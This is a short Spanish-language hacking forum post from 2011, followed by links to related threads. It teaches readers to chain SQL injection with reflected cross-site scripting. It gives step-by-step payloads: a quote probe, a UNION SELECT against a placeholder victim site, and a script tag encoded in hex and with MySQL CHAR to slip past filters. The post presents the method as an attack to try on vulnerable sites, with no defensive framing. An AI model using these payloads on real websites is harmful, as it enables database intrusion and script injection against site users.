Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS no persistente con SQLi

  • 0 Respuestas
  • 1762 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« en: Agosto 25, 2011, 12:08:40 am »
Para hacer una inyeccion XSS no persistente a travez de una inyeccion SQL hay que hacer lo siguiente:

Encontramos un sitio vulnerable

www.victima.com/index.php?id=1'

Luego hacemos un UNION con la cantidad de columnas (Ej: 6)

www.victima.com/index.php?id=1 UNION SELECT 1,2,3,4,5,6--

Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo

El original es

<script>alert("XSS");</script>

Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL

HEX ENCODED:


0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e

MySQL CHAR:

CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)

Espero que les haya gustado!

 

¿Te gustó el post? COMPARTILO!



SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

Iniciado por ..::key-m0rt::..

Respuestas: 0
Vistas: 2024
Último mensaje Marzo 23, 2010, 12:38:21 pm
por ..::key-m0rt::..
LFI+SQLI [Incluyendo ficheros a travez de valores enteros]

Iniciado por q3rv0

Respuestas: 4
Vistas: 2106
Último mensaje Julio 24, 2013, 01:43:36 pm
por M5f3r0
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface]

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1837
Último mensaje Julio 21, 2010, 07:43:44 pm
por Xt3mP
Dorks, Utilizalo en GHDB para Sqli

Iniciado por M1ndCr4ck

Respuestas: 1
Vistas: 2893
Último mensaje Julio 04, 2012, 04:48:55 am
por backconnect
Inyección SQLi Manual Metodo (POST)

Iniciado por OswireW0rding

Respuestas: 3
Vistas: 3838
Último mensaje Marzo 16, 2014, 11:59:48 pm
por Snifer